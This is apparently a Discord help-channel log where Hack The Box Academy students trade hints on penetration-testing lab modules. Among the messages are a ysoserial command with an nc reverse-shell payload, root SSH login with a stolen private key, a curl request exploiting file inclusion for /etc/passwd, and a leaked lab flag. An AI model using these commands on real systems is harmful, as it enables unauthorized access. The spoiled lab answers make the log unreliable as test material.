#modules
When I remember Check the Login.php again, it maybe false
It was not like in the example I think. It was like admin_login.php or something
And maybe try rockyou-70 first. You can Save time since the full pw list takes longer
i find password but i try connect and I am redirecting to the same login page
now other password
Now try to login with these credentials
In admin panel
I think I did it a week ago and it worked for me
I am redirecting to the same login page
i dont see this message
Can you share the command line?
Can you share which wordlist you are using?
Are you including all possible variations? Subdomains, directories and extensions?
Have you added the found subdomains to your /etc/hosts file?
Can not really help further w/o seeing the command line.
One min...
Are you scanning each subdomain manually?
Yes. Including all extensions each time.
I can not help further. You are welcome to DM your command line.
I am looking for a syntax error. You can replace any spoiler with [SUBDOMAIN] and [EXT].
is someone else having technical issues connecting to the Phishing target machine at the cross-site scripting (xss) module? (103)
Try generating a new target - perhaps the one subnet is having issues
if you're lucky there are multiple subnets for the targets
This command worked fine for me. I don't know exactly what's not right with that command line you shared before. @flint sonnet
Did you maybe type -e .ext1, .ext2, .ext3 instead of -e .ext1,.ext2,.ext3 (w/o the space between , and .)? (That's how it appears in your screenshot)
One or two index files?
may be this is ur issue
The wordlist being used does not include a dot that's why you DO have to add a dot in the -e flag. (not like the extension wordlist)

ok
just tried to help
don't even know the context so I should just close my mouth

It just worked fine for me. 🤷♂️
I did not realize that you are using a different wordlist. Try.
Web Requests: GET Method
Q:Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337.
A:??? -how do I do something like this when there is no flag.php- I mean I'm guessing I need to do something like:
<?php
$num1 = 1330;
$num2 = 7;
echo $num1 + $num2;
?>
or am I underthinking it
Any help is needed
Following up on this. Is anyone available for a DM regarding this section?
Follow the example in the "Query parameters" section.
okay I'll try that thanks
Hello friends,
Has anyone here completed the "Using Web Proxies" module? I am struggling with the question on the "Repeating Requests" section. I have modified the http request in Burp Sequencer to do a recursive list all in an attempt to find the flag (The hint says it's in a different directory --- it is NOT the flag.txt that appears right away) but I am still unsuccessful.
If someone could help point me in the right direction it would be much appreciated. Thanks!
thanks I got the flag 😛
@tranquil carbon hey, I got stuck on the 1st question of that same module. I don’t know how to format my answer. It is the one where you spawn a target and use the Ip and wordlist to find a different domain or something like that
I got like a blog and forum output
Just finished the Windows priv esc module. If anyone is stuck, feel free to shoot me a DM.
so i'm doing shell of anatomy and i'm up to the question where it asks for the language used in both shells in the format shellname&shell name but both shell used in explanation use the same language but just isn't accepting my answer, any help?
ok wow I'm stuck. I'm in the nmap module, where I have the ports 80,110,139,142,445,31337 ports open, of which I need to find one that holds some flag.
This is the section after the nc section - this section they talked about the NSE, and they hinted that webservers are the most attacked services blah blah - so port 80 it is I guess, but no results lmao (tried the -A, --script vuln, -Pn , and what not, but no flag). What am I supposed to do? Can't believe that I'm stuck over an nmap's module section for over an hour
Name of section?
NSE (Nmap Scripting Engine)
NSE 😑
mb
One min...
If you did what you wrote, then the answer is in front of your eyes.
Rah
How
I literally applied -A --script vuln on all ports
Some of them didn’t comply with ICMP so I added -Pn to the individuals that didn’t indeed comply
Nothing got returned instead of basic info
did you also have issues with ICMP and had to opt for -Pn?
That basic info, that's all you need.
well yea but there's no flag
There is. Somewhere there.
All you needed is a script that's included in the category vuln, discovery and intrusive.
You used that script. You just need to go a bit further.
Any more hint would be spoon-feeding 👶
oh god I've went through that term enough - no need to educate me on spoon-feeding
the script doesn't work for me on port 80
--script vuln works?
the other ports.. I only get the hostname, which is I assume can be used for the ssh but no password (brute forcing it also didn't work)
nope
stuck at 97.97%
tried to time it out but didn't help as I mentioned
Give it some time. Even a few minutes.
I've tried several times
each time elapsed over 15 mins each
over the course of the last 3.5 hours
tried from the parrot pwnbox, tried from my own VM
I wouldn't have asked for help unless I've burnt through google and my other pen-testing friends
As long as you can ping that IP, it should work. Don't add any unnecessary flags. Just run the script.
And you can try the other categories I mentioned above.
running
will give it to run a few minutes, then I'm giving up
3 minutes in (threaded it over intrusive, discovery, and vuln)
nothing
welp
Give it some more time... did you add any flag?
nope
yea time is not at the essence, heading off to school - it will have plenty of time
man why am I even trying
let me gobuster it
LMAO
bruh this is bullshit
the scripts are running over 5 minutes each
gobuster 10 seconds - ||/robots.txt||
bruh
spoiler alert 🙂
well by the section I should've used the scripts' engine
never would I ever opt for using NSE for enumerating a web service
That's after you got a clue that the vulnerability is in the web service.
well, yea, but NSE didn't supply me with the fact that the port 80 was open
it was the regular scan that the library did
I mean I get that the NSE is good for databases etc, but not for the actual web enumeration
--script http-enum is included in those three categories I mentioned above.
More about it here:
https://nmap.org/nsedoc/scripts/http-enum.html
And once your scan is done, you'll find it out.
Bruh, I already tried this script individually right now as well as a few hours ago, and it was still stuck over 10 mins each time I ran it
I have experience in programming , I know what the required steps are before going on to bothering other people for help.
I’ve tried google, got a confirmation from intrubidus that what I’m doing is correct, still didn’t work.
I think it was just a screw up in the vpn’s bandwidth limitation..
Maybe try spawning the box again. Or add -vvv to ssh to get more info.
Google has some info about that. Found something related to MTU.
I would appreciate to know if and how you solved that.
( #boxes message )
Looks similar to your issue.
i just got the flag
IMO It's so bad. almost can count as a bug
why only replace htbadmin in one place instead of two places?
If you are still needing help with this feel free to dm me. 😁
hey! all
I am learning to hack
pls help me too learn
but how to install kali linux
This is not the right channel but anyway you can follow https://www.kali.org/docs//installation/ to install it easily
if you have any questions you can ask in #613049811481919508
and verify typing /verify ( in #bot-commands ) in case you're not able to see other channels
ok thx!
anytime
Following up on this again. Has anyone completed this module?
can anyone help me on getting started module in public exploits section I can't find flag
Please clarify in your question what have you tried already and where you are stuck.
I tried simple back up file read exploit in metasploit then it gave me a txt and I got stuck there
what can I do
Then your "options" in MS are not right.
am I need set rport to 80 or a nmap scan and set to http port
If you got a file, but not the right one, then your RPORT and RHOST are right. Read the question again.
Sorry to interrupt, is HTB Academy good prep for tackling OSCP exam?
Anyone available for a quick question about on common app skill assessment 1 - about the shell part? Edit: solved of them that was about answer format.
That message got lost in time. Can someone pls help
Which module? Which section? What have you tried by now? What does not work?
Anyone tried the OSINT:Corporate Recon module?
Asking about your attempted solution rather than your actual problem
Hey! Can someone help me a bit with the 'SQLMAP ESSENTIALS - SKILLS ASSESSMENT'? After a few days i have still no clue where to find an attack vector...
Bro dm me i want to help you
open burp, look around by clicking different links and buttons. Open the history to check vuln params once you think you did all the spike
wait why dont i have permission for anything else
hi guys can anybody help with the skills assement module of login brute forcing I am pretty stuck here I tried so many wordlists already :/ [SOLVED]
any advice? been running hydra for over 15 mins
obviously used the assistance of wiki to gather information but as expected a wordlist made up out of a fictional character is hard to have faith in after all
20 mins running and only now it found it - seriously aren't there any better brute-forcing tools than hydra?
20 minutes? My goodness. They are not supposed to take more than 5 minutes. Are you increasing the threads number (-t 64)?
@dusk bronze Hydra is good, but if you want another alternative here is this https://github.com/lanjelot/patator
nah, only 4 threads
will for sure check it out, thanks
But be warned, its syntax and usage is nowhere as easy as Hydra is 😉
🥴
Solved?
Hi, can you help me please? I managed to get only one flag for the case n°2 but I can't do the rest. I understood that I have to do something with the cookies because the id is stored in them but I'm blocked for the sqlmap command and how to find the flag, can you tell me please?
Module : SQLMAP ESSENTIALS
Sections : Running SQLMap on an HTTP Request
there are 2 ways to interpret the question of the answer u need to submit
it's mainly an interpretation error
the question tells u which username u should use
Hi
hi
do u mean ranking in the HTB?
I only did 1 starting point box yet😂 I am doing a lot of academy first
.
Why?
you need to elaborate first i'd say
I am just wondering if this is related to your original message #modules message @west rampart
Module: Hashcat
Section: Common Hashes
What's the way to go w/o trying all the built-in rules one by one? Any hint is appreciated.
i have a question on cubes
if i unlock a module for say 10 cubes
and upon completion i'm rewarded with 10 cubes
does that mean i get back the cubes i unlocked it with and end up with 20 cubes?
For Tier 0 modules, they are free as long as you complete the module.
Pay 10, receive 10 by finish.
No, you dont get 20 cubes. You get the 10 back that you paid with; so net gain/loss is 0 (aka free).
@rustic sage I have a hint for you. Did you do the Driver machine from the HTB platform?
If you have done it then of course you have stolen a hash then cracked it. Your hash algorithm is not that but the previous version of that hash 😉
I haven't done that box. But besides the algorithm, the "Hint" button indicates that one of the build-in rules should get applied. How can I determine which rule?
@rustic sage Check your DM.
Is there a way to get the student subscription if my university is not registered to the academy ? And also it does not have an academic email but I can prove it is recognized and I'm doing the course ?
Thank you!
Have any of you fine folks completed the SQLMap Essentials Skills Assessment? I believe I have found an injectable http post request but have been unable to exploit it. If anyone is available I can provide more details.
Anyone complete the Attacking Web Applications With FFUF Skills Assessment? Need a nudge on question 3.
Hello everyone any who can guide me in Web Attacks - Skills Assessment module
What have you tried?
Are you referring to "Attacking Web Applications With FFUF"?
I'm fuzzing the subdomains from question1 with the extensions from question 2 for directories and then files. I found a directory but can't find any files other than those that start with "." or index. Tried different wordlists from SecLists but getting same results. I don't really understand the Hint provided.
Thanks for clarifying.
- The hint isn't really a hint, rather an instruction on how to enter your answer. Do not enter http://SUBDOMAIN.DOMAIN:99234/XXXXXXXX, rather http://SUBDOMAIN.DOMAIN:PORT/XXXXXXXX. Replace the port number with the actual word PORT in your answer.
- A screenshot of your command line (w/o spoiling it) would help a lot.
STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86: Fuzzing Parameters
Hi guys. I'm pretty sure i've found correct answer (length). But It's not valid.
I'm sure cuz when i generate payload of length x i have 41414141 in eip
and when i generate payload of length x-1 i have 0D414141 in eip.
DM me
Thanks for clarifying the hint. I got it!
Hey! Anyone else having problems with the 1st question of the "Shells & Payloads" module in section "Laudanum, One Webshell To Rule Them All"?
What is your issue?
i'm pretty sure about the correct answer, but the submission is not successful
PM me your answer
Hiya! I am running through the Linux fundamentals module just to brush up, and I am the Web services section where it asks me to start a web server using npm. I have a couple of commands that accomplish what the module asks for (start a webserver on port 8080), but none of them appear to be what the module thinks is 'correct'. Anyone have a hint?
Ah, nevermind, I got it! Though, I should add that the command the module accepted does not actually work on my VM, and I am seeing others frustrated by that particular question 😅
hi! stuck in Shells & Payloads "Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt" i try to run the exploit but i get error "metasploit nomethoderror undefined method 'spit' "
Did you try googling that error? Issues with your installation of metasploit are beyond the course. Are you using pwnbox?
If not, if you've tried everything, you might need to reinstall metasploit.
i connect to NoMachine 1st so i cant do much with metasploit from there and from pwnbox i get the same error
Next time you get the chance, try using locate from the terminal to find the exploit name then in MSF type out the full name of the exploit.
can i PM; so i dont spoil
Hello. I'm just starting the Linux Fundamentals and I'm on the Package Management module. In the 'APT' portion, using the VM, it says that I can check the repository for Parrot OS at /etc/apt/sources.list.d/parrot.list
However, on my VM, that directory is empty.
Also, the module says the terminal should read
[user name]@htb[/htb]$
but my terminal on the VM reads
htb-student@nixfund:
Am I doing something wrong with the VM? Should I just ignore this and keep going?
hello i'm doing the "getting started" public exploits
not sure what i'm supposed to do
found the plugin but don't really know how to send the options to run it on metasploit
Hey guys, about to run an ssl evil twin attack ap on my network would any one recommend an 802.11x dongle on with my pie machine ?
Go along with the error message you got. At least RHOSTS is not set correctly.
The reason you are getting this is because you did not set the VHOST option 😉
Set the IP address in RHOSTS then set the VHOST to be what is given in the module and you shall arrive 😉
Hi guys, can i have some help for Broken Authentication skill assessment. I think i'm so close
I already got 2 departments other than support. deparx.xs xn xt xr
grep '^[[:upper:]]' 0.txt > 1.txt
grep '[[:digit:]]$' 1.txt > 2.txt
grep '[[:lower:]]' 2.txt > 3.txt
cat 3.txt | grep -x '.\{X0,X9\}' > 4.txt
grep -E '\$|#|@' 4.txt
then bruteforce, i should be able to login
hello i need help to find an answer to the ffuf
in addition to the directory we found above, there is another directory that can be found. What is it?
Hey im on Shells & Payloads - Skills Assessment second question, any help?
Please don't expect to get the right answer but just a hint. And for that, you would need to elaborate a bit more on what you have tried till now.
ok but i've been stuck on this for a long time
I am trying to help. But if you don't want to get helped, you are going to stay stuck for even longer. No one is going to tell you the answer off-hand.
The FFUF module has several sections. It's not clear from your message where you are holding. And without knowing what you have tried till now, it's impossible to help.
Therefore, please, just have mercy on all the people that want to help and provide enough details so they can help you straight away, without having to ask back tens of questions till your problem is clear to them.
@loud sparrow DM me.
Attacking Common Applications - Skills Assessment II
do I need to privesc? because I can't find flag.txt as regular user
I have made working shell code but I don't know how I'm supposed to make it run on the vulnerable server
Nvm just had to paste it after connecting
Hello all, is this the right place to ask for help with one of the Academy 'Getting Started' modules?
Yes it is
Excellent! So I'm on the 'Privilege Escalation' section, and I've managed to ssh into the remote host as user1, and obtained user2's shell. I've also noticed that I have access to the /root/.ssh directory, and I'm able to read the contents of id_rsa, however, I'm not sure where to proceed from there. I've tried copying the contents to my local machine, and ssh'ing using that key, however I'm prompted for user2's password. Am I on the right track? And if so, I'd appreciate some advice on how to proceed
You need to make the id_rsa file executable by typing chmod 600 id_rsa and then you can login to ssh with the root account using ssh -i id_rsa root@<ip>
and finally you'll be able to read root flag
I did that, and it still didn't work. Should I be saving the ssh key on my local machine, or on the target host?
Oh, wait... I didn't log in as root
D'oh. Let me give that a shot 🙂
Yes keep me tuned
It worked. Thank you! I do have a followup question - if I go to the /root/.ssh folder, and type ls -al, I see that there is a public and private key in the directory. Am I correct in assuming that the owner of the key is indicated right next to the permissions?
Well done 
Yes that's correct
Appreciate the help, thank you
No problem, ping me if you need some further help
One last newbie question for today - If I want to identify my account or see my rank, do I enter /rank into the chat here?
You first need to verify typing /verify in #bot-commands and then you'll be able to see your rank as a discord role
Like mine with "Hacker" for example
Ok, cool
Friends who can help with Windows Local Privilege Escalation? The last two modules.
Hello Fellow hackers
I’m struggling with the network enumeration with nmap IPS/IDS medium lab
I don’t know how to find the DNS version
I believe that the port is the 53
Someone could give me a hint?
Hey guys, I also need some help with the nmap - hard lab, is someone online?
Can I get a sanity check on the Windows Priv Esc module?
Nvm I got it. Box wasn’t stable
@main vapor tnx it worked
@urban sage do you have a second, to give me a sanity check on that?
I haven't done the nmap academy module. :-/
damn it, do you know of someone who did?
Not right off nope.
feel free to DM
@woeful oxide
anyone did the hashcat module and can help?
Just finished with it today.
thanks, I might come back for that offer tomorrow, my brain is mush right now
Hello all, hopefully a simple question for you - does the http.server python module work for sending remote http requests, or does it only work for local network environments?
did you find the answer?
yes
Hey guys, I have a question about a hackthebox academy room.
I think I'm missing something and misunderstand the task....
I am already administrator in the dashboard and changed the cookies to log in, but what is the solution to the question?
Is it the admins name, the cookie, or something else entirely?
Please give me a hint, not the answer itself.
forgot to say it`s the "web requests" module and the "post method" part
Try to put a screenshot bro
Anyone have a moment? Stuck on the privileged groups part of the Linux Privilege Escalation module.
Hey team. Having an issue with this question as when I do the nc -lvnp 9443 I get "listening on 0.0.0.0 9443" instead of "listening on [any] 9443"
Under Getting Started ?
No, I've already completed that one. This one is under Linux Privilege Escalation.
Which part are you needing help with ?
I've located the directory that the group has rights to, but am struggling to find anything useful in the logs.
I don't think you'll find it in the logs
I haven't done this one yet but my understanding of the question is that you might need to search for something like an APP_Key in the log for a base64 or something that you need to decode that will take you to something else
I can always be wrong having not done this myself
otherwise maybe a call for linpeas?
Good thinking, I'll try and search for some keys.
could somebody help me with that? Maybe some have done the room?
Looking at that section again to see if I can help.
thanks
Anyone got time to help me with the File Upload Attacks module?
Is anyone else able to see the support-popup at all? My browser complains about adblock - but there is none enabled.
#613049811481919508 In any case, there is a bubble at the bottom right.
Anyone have any help with this? Stuck on the privileged groups part of the Linux Privilege Escalation module.
I am doing the Windows fundamentals, and I keep running into an issue where I can RDP into the windows machine without issues, but if I try to ping or smbclient the same machine it will fail :/
@raven scarab not sure if it matters but on the hydra bruteforcing module, i couldn't ping any of the target machines. But was able to do Hydra attacks against them.
Consider the firewall in Windows. This is one of the key lessons learned in the module 🙂
Hi everyone! Can somebody help me with reverse shell for this java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc 1.1.1.1 4343 -e /bin/sh'.
Victim on Windows Weblogic
No luck yet huh ?
anyone on hashcat skill assessment? I am on last question and I succeed 78% of passwords but the frequency is not fine enough to get the answer. I ran out of ideas to increase the %. Help, please.
Not clear to me, since with a lower % I got the answer. 995 hashes. Cracked 65.
Just rockyou - did not get to masks and rules yet.
You only need the users in INLANEFREIGHT.LOCAL domain.
Maybe you are not using the --username flag? W/o it hashcat associates each hash with a username, therefore if several users have the same password it would get counted as one.
thank you, it was that the flag... thank you!
Can someone help me with assembly skill assessment?
I get a segmentation fault at line 7
Hi everyone, I seem to be stuck at the skills assessment in the SQLmap module.
I think I found the right vector to SQLi, but I can only retrieve database names/table names/column headers and not the data within.
All data is marked as <blank>
Can anyone give me a hint here?
d5w dm me
you need to grep inside var/log files
I have been, I guess I'm just not sure what I'm searching for. I tried searching auth.log, syslog, alternates.log, etc but didn't find anything interesting
will do
mov rax,0x10b29a9dab697500
here ?
Can u tell me the context
and the question
I don't have the module sir
What is it for. Is it a question or in the lesson
Not anymore
Can I code these in regular notepad
anyone down to help a beginner in the "Check Knowledge" in the getting started about hacking module
Hi I'm stuck starting point on the preignition machine
What is considered to be one of the most essential skills to possess as a Penetration Tester?
I can try. Where are you stuck? What have you tried?
alright so i got the foothold, got the user flag, and then i set up the reverse shell.php, i found out by doing sudo -l that i can run /usr/bin/php, so got the reverse shell.php code from the module that was showcase in the nibbleblog exploit but instead of root i got a normal user login instead of the root one. So basically i need to get a reverse shell php code to get root access, i cant download LinEnum from my vm
Great! You're almost there. Look for a different option @ https://gtfobins.github.io/ under php.
Hey! Anyone else working on the "SHELLS & PAYLOADS" Module? I've struggled a lot getting a shell for HOST-02 with METASPLOIT...can't get rid of a "NoMethodError", so finally i decided to exploit manually without msf and got the flag...but i am curious whats the matter with the msf-error, as i think the modules purpose is not doing it by hand
got the reverse shell code for that but im still the default user www-data
probs done something wrong, doing this while eating isnt eazy
got an idea, i can read a file that a normal user cant E: using php* but i tried and couldnt
god dayum i got it, i forgot to run it as root (sudo). I cant be dumber than this
thx for the reminder of GTFOBins i forgot that existed
Could someone dm me about the assembly code for task 1 in skill assessment? I just need to insert a print function in a loop but I'm lost
In LFI module I'm stuck at the 2nd page, I was able to see the source code of 2 files - although not for all 5 pages - but I can't seem to be able to get the /etc/passwd file... I think I understand the source code but I guess that's not the case otherwise what I'm trying would work...
Please help me I am on the web request module and the bottom bar isn't showing up for me and I'm not sure if is a problem with the instance or my browser
not sure what you mean by the bottom bar?
ah I think you're using a pwnbox... if that's the case you can try the Windows or Windows+a keys and if you still don't get a menu I would respawn the box
I just spawned one in my module and it looks nothing like yours and I don't really use the pwnboxes myself so I'm not sure
I prefer to use my own VM and connect with the academy VPN
Alright I will keep that in mind when I start my next instance tomorrow cause I'm on the free plan also thanks a lot
Please don't post spoilers
Hi guys, I'm currently stuck at the skill assessment 1 of the "Attacking Common Applications" module. I've figured out the possible vulnerability and did successfully fuzzing the ||cgi|| directory. And from the POC that I've read, it requires that we know the ||script name|| on the server, but I've been fuzzing for a whole days with all kinds of file extensions and wordlists but no results. If someone can give me a nudge that would be very helpful! Thanks in advance.
you have to put the subdomain name instead of the ip
download the vulnerability 50064, use msf
you have to put the subdomain name instead of the ip
For the "Included" Tier2 module, I'm not getting a reverse shell on port 1234 as in the walkthrough after performing the "curl" command. Kind of stops the entire lab exercise. any suggestions?
This is the command used: curl 'http://10.129.164.96/?file=/var/lib/tftpboot/shell.php'
and the contents of the file is returned with correct IP and port
Hello, I am a bit stuck at the module Information Gathering - Active Infrastructure Identification at the following question: Which CMS is used on app.inlanefreight.local? (Format: word)
How can I query app.inlanefreight.local in combination with the ip-address?
Yoo guys, currently on the javascript de obfuscation module and it wants me to get the flag but it doesn't show me anything beyond how to get this line of text
eval(function (p, a, c, k, e, d) { e = function (c) { return c.toString(36) }; if (!''.replace(/^/, String)) { while (c--) { d[c.toString(a)] = k[c] || c.toString(a) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g 4(){0 5="6{7!}";0 1=8 a();0 2="/9.c";1.d("e",2,f);1.b(3)}', 17, 17, 'var|xhr|url|null|generateSerial|flag|HTB|1_4m_7h3_53r14l_g3n3r470r|new|serial|XMLHttpRequest|send|php|open|POST|true|function'.split('|'), 0, {}))
and so with this line of text, how can I find the flag?
awh lol
got it lads nvm
Thought the flag was in the text I pasted above but it was in the HTML code sorry
thanks!
hello guys.
so while im working on hack the box - academy modules, I want to use my own virtual machine instead of given workstation.
https://help.hackthebox.com/en/articles/5185687-gs-introduction-to-lab-access
does this step allows me to connect with the academy modules as well?
@graceful glen Same concept, but different VPN file.
When you do modules you will be provided a file, just use that one.
i see. thats something i was worried about.
So I am working on using web proxies but I can't seem to find the vpn file for it. do you know where i should check?
Not every module requires one. If it does, you will 100% know that it requires it.
And you only need to download that file once as you can use it all the time throughout your journey.
oh I see. so if the module do not contains one, then I have to go other modules to find one and use that to finish other modules with my machine correct?
If the module requires it then yes you need to connect to the VPN using the file they provided. Otherwise you are all good.
hmm okay.
because the burp started to get laggy in workstation for some reason.
thanks for the awesome answer 🙂
Hey
Anybody done hacking wordpress
I am stuck at directory indexing
Can't enumerate without logging in at wp-login
@mint karma DM me.
not sure what it's asking me to do here? SSH into the server using "178.62.107.125:31817" if so how? as when I attempt to it just says unknown host
when adding a Vhost to my /etc/hosts how does it work?
I assume you have to assign it the IP of the original site without the Vhost, but then, how exactly does the header Host: vhost.somesite.com get added when performing a fuzz over it?
As mentioned in the fuzzing module, in order to actually scan for connectivity you have to include that header in order to connect to the vhost, so how exactly would I add such thing to my /etc/hosts file?
ahah nvm I got it
I am too smart 
joking
in the module I am in they run this nmap --script smb-os-discovery.nse -p445 10.10.10.40
when I run it with my own windows computer it doesnt output what it outputs for them, any idea why?
its supposed to output this but it only outputs the port and state and service tab but not the HOst script results
oh wait is it not giving me the same output as on htb module because the version of it cant be exploited?
Anyone here completed the Shells and Payloads module? On the Skills Assessment I'm not sure why i'm not able to use the 50064.rb exploit that is on my pwnbox. From msfconsole i am trying the use command followed by the filepath.
sorry for not being any helpful as I haven't done this module yet, but how was your experience with this module? anything interesting/valuable? (Contemplating over doing it)
In LFI module I'm stuck at the 2nd page, I was able to see the source code of 3 files but I can't seem to be able to get the /etc/passwd file... I think I understand the source code but I guess that's not the case otherwise what I'm trying would work... anyone can provide a quick hand?
@tough ibex @west canopy Make sure you are using the foothold machine.
And, there is NO NEED to download the exploit from online. The module author was very nice to ___ (fill in the blanks)
Because even if you download it, you don't have write permissions on /usr/share, so you can't put it where Metasploit wants it 😉
Which is/are
Split or something similar?
hmmm, I did not get this one, I got something else. Make sure you set all of the options and set them correctly.
No
No something is not right
It was 172.X.X.X
damn
this is my first time ever asking anything
can someone help me with windows fundamentals course? im stuck on the last page skill assigments
@ornate canyon i believe i had to follow all the steps listed at the top of the skills assessment in order to get the answers. For example i had to create the user Jim before i could get his SID.
And create an HR security group, etc.
ah yes thanks
i created that user then group and did last 2 questions
I hate windows
I remember doing sharing stuffs permissions and services on windows server in my academy but this powershell is pain in the ass
@ornate canyon lol . Hey im glad you got it though!
Is the workstation meant to be blocked from internet access? Doing the POST module and I’m pretty sure that I’ve got access to the admin account ||via changing the cookie|| but the page doesn’t show anything besides the welcome message, and console shows jquery is undefined. Any attempts to hit internet urls just spin forever, so that would be why I don’t have jquery…
did you get feedback here? I'm having the same problem. Login with user "svc_backup" in Windows privilege escalation - Windows Built-in Groups is not possible. Same for user "netadm" in DnsAdmins and user "server_adm" in Server Operators
did anyone complete the Shells & Payloads module?
stuck on static analysis part in Assessment SECURE CODING 101: JAVASCRIPT, could anyone help me?
@tepid peak What help do you need
Still stuck where I was yesterday... In LFI module my curl request just hangs there, any idea as to why? Pretty sure my payload is good as from the index.php source code nothing special happens to the payload, no added extensions, no blacklisting.... I don't want the answer, I just want to understand why this payload doesn't get a response:
┌─[✗]─[user@parrot]─[~]
└──╼ $curl -v http://178.62.107.125:30475/basic/index.php?language=/etc/passwd
* Trying 178.62.107.125:30475...
* Connected to 178.62.107.125 (178.62.107.125) port 30475 (#0)
> GET /basic/index.php?language=/etc/passwd HTTP/1.1
> Host: 178.62.107.125:30475
> User-Agent: curl/7.74.0
> Accept: */*
>
The question is simple and the index.php file doesn't prohibit this request from going through so this is driving me insane.
@hollow bramble Which question in the module exactly?
Using the file inclusion find the name of a user on the system that starts with "b".
I got the index.php file of the basic and wrappers URI and the index.php and config.php files from the extension URI... in the basic URI nothing is appended or blacklisted so my payload should go through, but it doesn't even generate an error message, it just hangs there
Your payload seems fine to me. How about forgetting cURL for now and just doing it from your browser?
same issue... nothing happens
Reset the target and then try again.
already did many times since I've been stuck on this for 4 days....
Then I do not know what is the problem. If it persists, you might ask someone from the staff maybe.
hmm ok and how would I do that? the community-help section?
I genuinely have not done that before. (One last thing to try maybe is making sure your firewall is not blocking incoming packets, check that).
I doubt it since I can change the payload to receive the index.php file... but anyway thanks a lot ... I'll try to see if anyone from the staff can assist
I have a question about the file inclusion module
||When I try to poison the logfile with php code it always stops the output being displayed from file inclusion, is this normal? ||
I'm having issues with cracking the hash 978078e7845f2fb2e20399d9e80475bc1c275e06.
I ran hashid and looked at the examples online and it's obvious that it's ||SHA-1||, albeit, when I run hashcat on it using modes 6/7, with the mask ?d?s, and without the mask, it returns Token length exception and Signature unmatched accordingly.
The token itself is of length 40, but when I run wc -c hashfile.txt, it returns 41 (perhaps the suffix \0 constitutes that extra 1 (how we write strings in assembly)), so this might be the issue but I have no idea.
anyone who finished the password cracking module and can throw some light on this issue?
It's regarding Host-1 from the skill assessment, I was wondering where you got the credentials to log into Tomcat in the first place?
I only got them after reading the hint and don't understand how / if I was supposed to do it, it wasn't a default password or anything
"When in doubt use brute force."
@tepid peak i think the credentials actually didn't work for me when i tried them but I'm also not the sharpest tool in the shed. I believe i just navigated to status.inlanefreight or whatever the URL was , and then uploaded an aspx Laudanum shell like on a previous section in the module.
tomcat | Tomcatadm didn't work but I probably was doing something wrong.
and where is that from?
Ken Thompson, if you mean the author.
I also did that but it wasn't even in rockyou
Then the author's intent was not that maybe.
auxiliary/scanner/http/tomcat_mgr_login did you try this
The module is about "Shells & Payloads", so it does not matter that much whether you can guess the password or not I think.
And behold, now that you got a new password, add it manually to rockyou.txt 😄
Maybe your next victims might have it also.
They worked perfectly fine for me.
@main vapor well you know me. I still wear Velcro shoes because tying laces is way over my head.
Truly valuable knowledge from a module about RCE
solved, I used 101 mode instead of 100.
@tall crane Don't advertise servers here please
kind of an awkward question, but any idea why I might have the poorest connection on my VM (pinging google.com is a shit show, while access youtube.com through firefox is easy peasy, while on my main windows pc that is running the VM, pinging google.com and every other web service is running perfectly fine)?
things I tried, which all didn't work:
- closing my vpn
- renewing my ip on my main pc
- restarting the VM
- pinging other services
@dusk bronze Do you have any other virtual machines you can test on? If you're using a Kali VM maybe try a Parrot VM. Also I would maybe try using a different virtualization software if you haven't already.
yea I solved it now
apparently from one CTF that I did I installed some docker that establishes connections and I just forgot about it and somehow it pushed itself as the main network interface
so I removed it and restarted the host and the DNS is now working correct on both the host and the VM
and thanks
np 🙂 nice troubleshooting
I am trying to exploit web server on HTB module which is using wordpress 2.7.10 and has a "Backup File Read Vulnerability " but when I run the exploit it just downloads a txt which lists a bunch of file directories?
JESUS CHRIST the Cracking Passwords with HashCat module is a fking nightmare!
@dusk bronze hey but it builds character right?
Can anyone explain why the kali terminal changes from having the color coded commands to no color coding when you ssh into another box?
ok I'm totally stuck on the second question for the module File Descriptors and Redirections. I've been googling for the last 45 minutes and tried everything I've come across including HTB forum posts. I cannot seem to figure this out.
I've tried dpkg -l | grep -c '^ii' and got 2792
but that's not the correct answer
apt list --installed | wc -l gives me 2793
still wrong
just tried find / -name *.deb 2>/dev/null | grep systemd | wc -l and got 4
Need help?
Seems like you are not connected to the target machine.
Run that command once you connected via SSH.
thanks. I see now how that makes sense. I'll try it as soon as I can. I'm having technical difficulties getting the target ip to spawn
Hint: The output of that command is still not the right answer. Inspect the list: Add | head -10 to it.
And please be accurate. This is the Linux Fundamentals Module - File Descriptors and Redirections Section.
so I have ssh'd into the target system. now I tried apt list --installed | wc -l | head -10 and the number was 738, and is still the wrong answer.
That's right. Of course, it's wrong. wc -l counts ALL lines. All lines are indeed apps?
ah I got it!
I used dpkg -l | grep -c 'ii' | head -10
Can you explain what the difference is from 'wc -l' and 'grep -c'? It seems like they are both commands to display something..
sorry i'm very tired
may have already gone over this in the course
You would not need head -10 then. The reason why I suggested adding it, is so you can inspect the beginning of that list. It shows you the first 10 lines.
Please ask me again once you went briefly over man grep and man wc 😉
These two commands gave me different results.
dpkg -l | grep -c 'ii'
and
dpkg -l | grep -c 'ii' | head -10
the second command, with | head -10 added, was 1 less than the command without it.
🤷♂️
Please try again.
how can I wrap something in a spoiler
A screenshot or text?
I can't make sense out of it. 🙄
XD oh well. Thanks for the help anyway. 🙂
Anyone can explain this screenshot to me, please? 😕 (#modules message)
I’m virtually done, but thanks for offering.
It was quite a rough journey because instructions are so unclear (at least for me), and I find myself strengthening my BASH in this module rather than password cracking lol
who can help me with a c ++ problem?
I will give a try
whats ur issue?
#programming Also give more details about your problem otherwise nobody will be able to help you
I don't have access to this channel I can't write anything there
At a nightclub there are M boys and N girls. Determine the possibilities in which boys can invite girls, so that two boys do not invite the same girl, and each boy dances (N> = M).
verify urself with /verify then
hmm
do you have the N and M values?
yes
I will answer in programming section whats the number of N and M?
but I guess it would be N*M
do as you know
Anyone for Files Uploads skills assessment ? 🙂
I revise myself, I do need help. I went to sleep thinking that the rest would be easy peasy, was unsurprisingly wrong.
In the common hashes section, the given hash is obviously ||NTLM||, so mode ||1000|| it is.
After that I tried to apply common rules that wouldn't take longer than a few minutes, out of which the outstanding one was ||base64.rule|| in the hashcat rule built-in rule set.
